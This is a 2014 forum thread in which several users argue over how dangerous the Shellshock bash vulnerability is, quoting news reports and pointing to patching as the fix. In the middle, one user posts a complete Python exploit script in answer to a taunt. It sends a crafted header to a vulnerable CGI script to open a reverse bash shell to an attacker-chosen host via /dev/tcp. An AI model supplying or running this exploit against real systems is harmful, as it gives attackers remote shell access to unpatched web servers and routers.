Linux bash vulnerability

**Unix** · 25 September 2014, 20:03

Originally posted by suityou01 View Post

Patch Bash NOW: 'Shell Shock' bug blasts OS X, Linux systems wide open

Ok so this is a 22 year old exploit. Undetected for 22 years. Which means it's everywhere.

Uh huh. And I presume this is good news for Russia and ISIS and anyone else who hates the west.

All packaged up and ready to go for ease. How "professional"

Oh joy.

It's only an issue if you expose your shell to the internet via http, if you do then you shouldn't be using Linux.

**suityou01** · 25 September 2014, 20:07

Originally posted by Unix View Post

It's only an issue if you expose your shell to the internet via http, if you do then you shouldn't be using Linux.

Which most routers tend to do.

I love the way you are taking this so calmly.

All these experts are wrong and some snotnosed kid on a forum know better.

This one will run and run.

**darmstadt** · 25 September 2014, 20:08

Originally posted by suityou01 View Post

All packaged up and ready to go for ease. How "professional"

Just for you, now go find a system which lets you get to a bash shell:

Code:

#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

**suityou01** · 25 September 2014, 20:10

Any running apache will do

It puts Apache web servers, in particular, at risk of compromise: CGI scripts that use or invoke Bash in any way – including any child processes spawned by the scripts – are vulnerable to remote-code injection.

HTH bissssssssssdi.

**MarillionFan** · 25 September 2014, 20:14

Stop pissing about & get on with your resume.

**suityou01** · 25 September 2014, 20:16

Originally posted by MarillionFan View Post

Stop pissing about & get on with your resume.

Yes boss.

**Unix** · 25 September 2014, 20:16

Originally posted by suityou01 View Post

Any running apache will do

HTH bissssssssssdi.

If you are running CGI which access the shell and If the shell is bash and if your bash has the vulnerability even then it will not be running as root probably as www user which has very limited privileges. I checked my bash and it doesn't have the issue.

**suityou01** · 25 September 2014, 20:19

Originally posted by Unix View Post

If you are running CGI which access the shell and If the shell is bash and if your bash has the vulnerability even then it will not be running as root probably as www user which has very limited privileges. I checked my bash and it doesn't have the issue.

First attacks using 'shellshock' Bash bug discovered | ZDNet

this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable — once the worm gets behind a firewall and runs a hostile DHCP server, that would "game over" for large networks."

**Unix** · 25 September 2014, 20:23

Originally posted by suityou01 View Post

First attacks using 'shellshock' Bash bug discovered | ZDNet

There is a patch for it so just a matter of updating your bash via your package manager job done.

HTH

Linux bash vulnerability